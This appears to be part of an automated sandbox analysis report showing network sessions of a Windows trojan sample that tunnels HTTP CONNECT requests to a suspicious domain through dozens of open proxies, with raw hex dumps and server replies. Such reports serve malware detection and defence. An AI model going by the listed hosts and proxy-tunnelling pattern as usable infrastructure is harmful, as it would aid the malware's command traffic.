                                                                                Feb 23, 2024 14:28:28.042881012 CET1286INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69
                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta http-equiv="Default-Style" content="text/css" /><script type="text/javascript" src="js/jquery.min.js"></script><script type="text/javascript" src="js/jquery-ui.min.
                                                                                Feb 23, 2024 14:28:28.042963982 CET1286INData Raw: 65 64 22 3e 0a 09 09 09 09 3c 66 69 65 6c 64 73 65 74 3e 0a 09 09 09 09 3c 6c 65 67 65 6e 64 3e 46 72 6f 78 6c 6f 72 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 4c 6f 67 69 6e 3c 2f 6c 65 67 65 6e 64 3e 0a 09 09 09 09 3c 70 3e 0a 09 09 09 09 09 3c 6c
                                                                                Data Ascii: ed"><fieldset><legend>Froxlor&nbsp;-&nbsp;Login</legend><p><label for="loginname">Username:</label>&nbsp;<input type="text" name="loginname" id="loginname" value="" required/></p><p><label for="passwo
                                                                                Feb 23, 2024 14:28:28.043009996 CET470INData Raw: 3e 3c 2f 73 65 6c 65 63 74 3e 0a 09 09 09 09 3c 2f 70 3e 0a 09 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 73 75 62 6d 69 74 22 3e 0a 09 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 73 65 6e 64 22 20 76
                                                                                Data Ascii: ></select></p><p class="submit"><input type="hidden" name="send" value="send" /><input type="submit" value="Login" /></p></fieldset></form><aside><a href="index.php?action=forgotpwd">Forgot y


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                796192.168.2.852547154.208.10.126805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.583125114 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.746751070 CET309INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.23.1
                                                                                Date: Fri, 23 Feb 2024 13:28:27 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 157
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.23.1</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                797192.168.2.852421114.132.202.12580805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.586584091 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.195789099 CET84INHTTP/1.1 200 OK
                                                                                Date: Fri, 23 Feb 2024 13:28:29 GMT
                                                                                Transfer-Encoding: chunked


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                798192.168.2.85253034.95.243.12280815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.597764015 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.825442076 CET59INHTTP/1.1 200 Connection Established
                                                                                Proxy-agent: nginx


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                799192.168.2.85259013.37.89.20131285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.600156069 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.763669968 CET146INHTTP/1.1 200 OK
                                                                                Date: Fri, 23 Feb 2024 13:28:27 GMT
                                                                                Content-Type: text/plain
                                                                                X-Powered-By: PHP/5.4.7
                                                                                Server: squid/4.10
                                                                                Content-Length: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                800192.168.2.852469103.153.154.6805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.600434065 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.920289040 CET343INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.14.0 (Ubuntu)
                                                                                Date: Fri, 23 Feb 2024 13:28:27 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 182
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                801192.168.2.851231200.39.154.19995828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.609910965 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.649466038 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.785799026 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.858871937 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:51.867201090 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:03.866559029 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:15.929084063 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                802192.168.2.852580213.16.56.13241535828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.631787062 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                803192.168.2.85248043.133.80.236156735828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.637325048 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                804192.168.2.851443212.110.188.213344115828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.656042099 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.694945097 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.789117098 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                805192.168.2.85206198.170.57.24941455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.656172037 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                806192.168.2.852129201.71.3.589995828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.658219099 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.694967985 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.308350086 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                807192.168.2.852463221.2.84.42108005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.659445047 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                808192.168.2.852433103.182.213.100805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.661906958 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                809192.168.2.852610172.65.165.93300005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.662637949 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                810192.168.2.852601185.49.31.20780815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.664561033 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                811192.168.2.852037189.240.60.17190905828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.664717913 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.891643047 CET72INHTTP/1.1 200 Connection established
                                                                                Proxy-Agent: Fortinet-Proxy/1.0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                812192.168.2.851225218.57.210.18690025828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.677731991 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.694964886 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.049338102 CET311INHTTP/1.1 400 Bad Request
                                                                                Server: nginx
                                                                                Date: Fri, 23 Feb 2024 13:11:05 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 166
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                813192.168.2.852492102.132.57.9080805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.682171106 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                814192.168.2.85252947.56.110.20489895828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.683372974 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.987936974 CET309INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.16.1
                                                                                Date: Fri, 23 Feb 2024 13:15:04 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 157
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                815192.168.2.85260372.210.252.13741455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.694433928 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                816192.168.2.852497125.19.99.9041455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.694441080 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                817192.168.2.852526123.126.158.50805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.700162888 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.047353983 CET59INHTTP/1.1 200 Connection Established
                                                                                Proxy-agent: nginx
                                                                                Feb 23, 2024 14:28:29.075130939 CET394OUTData Raw: 16 03 03 01 85 01 00 01 81 03 03 65 d8 9d 7c a4 eb 6d f5 76 d8 7c c8 4c 2c 56 79 ea cd 67 f9 78 99 28 cd b4 f3 7e 2c e4 1d 64 f3 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                Data Ascii: e|mv|L,Vygx(~,d*,+0/$#('=<5/.-+(heygirlisheeverythingyouwantedinaman.com#]31VM\11_&nk7%6ydd`8
                                                                                Feb 23, 2024 14:28:29.719669104 CET1286INData Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 d8 9d 7d 8e 99 25 7a e0 00 d0 ec ae 56 7c 13 32 4c fc 54 f8 3f 34 58 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 cb 0b 00 10 c7 00
                                                                                Data Ascii: C?e}%zV|2LT?4XDOWNGRD/#00`4ZmQ0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240212203110Z240512203109Z03110/
                                                                                Feb 23, 2024 14:28:29.719676971 CET162INData Raw: 6d dd 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 03 82 01 01 00 1f 8b 40 68 93 64 2a 2d dc 07 bd 7a 5f 46 c4 ea f2 c8 d7 63 e0 4e cc 42 c7 44 46 d1 17 84 d3 1f 08 47 69 c2 b6 7f dd 9d a0 2d 9e 1b be 1f f8 19 ab ad d9 8d 7d 14 62 f3 40 cf 76 94
                                                                                Data Ascii: m0*H@hd*-z_FcNBDFGi-}b@v*wTJ;dm55inz74|"@,+v?iS
                                                                                Feb 23, 2024 14:28:29.719683886 CET1286INData Raw: d2 e7 91 27 74 d7 ee 13 8a 11 b0 a8 a3 e4 d5 3b 48 03 d9 a4 25 cb 08 0c 15 0b f0 5b 9d cd 27 fd a8 ef f9 8b c7 ac dc 0d be eb 0c 72 e2 42 ee 75 2a b8 1b b1 19 71 88 a8 e8 2c 14 2f 09 61 65 b1 cd 59 a5 fa 58 68 9d a3 d1 9c d8 9d c9 08 56 96 9f 42
                                                                                Data Ascii: 't;H%['rBu*q,/aeYXhVBc_[:72cG^x}gv00tP'S"0*H0G10UUS1"0 UGoogle Trust Services LLC10UGTS Root R102008
                                                                                Feb 23, 2024 14:28:30.054160118 CET670INData Raw: 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e 63 72 6c 30 3b 06 03 55 1d 20 04 34 30 32 30 08 06 06 67 81 0c 01 02 01 30 08 06 06 67 81 0c 01 02 02 30 0d 06 0b 2b 06 01 04 01 d6 79 02 05 03 02 30 0d 06 0b 2b 06 01 04 01 d6 79 02 05 03 03 30 0d
                                                                                Data Ascii: .goog/gsr1/gsr1.crl0;U 4020g0g0+y0+y0*H4(v1z!R>tA=5\_|W&o[Fh7okz7%QhIZ#+IjuXHW5oo*Ni-h+s"7
                                                                                Feb 23, 2024 14:28:31.432442904 CET1286INData Raw: 09 94 ad 5d 76 5d 28 56 d1 1a 66 51 51 07 7b de 3d b0 c8 ef 30 7a 24 2d be b8 b3 86 f6 4b f7 f0 b5 4f ff ce c6 f9 f6 3f 2a 27 08 0f 09 3e 23 5a c7 e3 42 2d 7a 36 e4 3d 98 96 60 39 98 ea d1 db 63 2a eb 78 09 b1 4e 21 b3 8e b7 ce 3e 92 f1 95 5c a4
                                                                                Data Ascii: ]v](VfQQ{=0z$-KO?*'>#ZB-z6=`9c*xN!>\9+S/tgw7-[peZ%wjNuMjfynm"m,P5}pY*j%[ @4 awHI)adcGF9sO+Xe U
                                                                                Feb 23, 2024 14:28:31.442419052 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 14 e4 42 ce 8c f0 7b 88 dd 97 a4 b1 f6 c8 64 ef 6a 10 77 e8 8f 11 48 d2 3f 6a 6d c8 87 fe 80 7c 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 db 88 c5 7e 48 da d3 c6 51 1e ed f9 60 ab c8 22 cd 87 5c 4d a8
                                                                                Data Ascii: %! B{djwH?jm|(~HQ`"\M\:-^u
                                                                                Feb 23, 2024 14:28:32.099315882 CET258INData Raw: 16 03 03 00 ca 04 00 00 c6 00 00 fd 1e 00 c0 af f8 b2 29 a1 7b be ac 02 f3 77 2e 43 e9 5d b1 bb c3 35 97 5b ae c8 4c df 23 42 f7 1d dd 6b 0d bd cd fd 41 3f 08 fb 16 8f 11 2b 2b bd 55 7d a9 e3 a8 c4 7d b7 4b 68 39 9b 99 bb ba 08 30 d8 e2 ce e8 87
                                                                                Data Ascii: ){w.C]5[L#BkA?++U}}Kh90vE4EF`c]G*@!`P:iOwL"aVYY9$bP%*(pm}=^
                                                                                Feb 23, 2024 14:28:32.234863997 CET147OUTData Raw: 17 03 03 00 8e 00 00 00 00 00 00 00 01 85 6e b4 e2 60 df 72 64 4a 4b 98 a3 32 20 2e cd c6 c7 cb 31 87 11 4f 28 00 ca 88 22 a8 d1 53 75 2f 9f ac 1c 5d 21 12 fb 5a a8 de 5d 10 22 ab 18 f1 aa ac b4 a7 40 0e 10 0d 60 71 87 07 8a b3 f0 9c 28 31 e8 16
                                                                                Data Ascii: n`rdJK2 .1O("Su/]!Z]"@`q(1;[+$wlMw<):?y1uy]j#lo5*?dc*
                                                                                Feb 23, 2024 14:28:33.248714924 CET112INData Raw: 9b 89 6a ec 6e de e9 a4 16 9e c2 a1 03 b9 3a 93 74 37 16 7d 9c 75 33 f9 78 e6 6a 8e 42 cf f3 87 d5 98 05 97 02 1e fa 5b 71 7d 22 78 cb ee 22 60 16 e1 87 09 e3 1c 48 2b 76 44 8f 3b 08 31 0d a6 95 4b 50 ea 91 2a 87 5c 56 b7 4c 65 24 b5 8d 08 89 b3
                                                                                Data Ascii: jn:t7}u3xjB[q}"x"`H+vD;1KP*\VLe$!5>DCm*Mz=


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                818192.168.2.85265267.205.162.103329095828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.706887007 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.124484062 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.585649967 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.272845984 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.527604103 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.898132086 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                819192.168.2.852661172.67.181.144805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.707825899 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.796749115 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:27 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
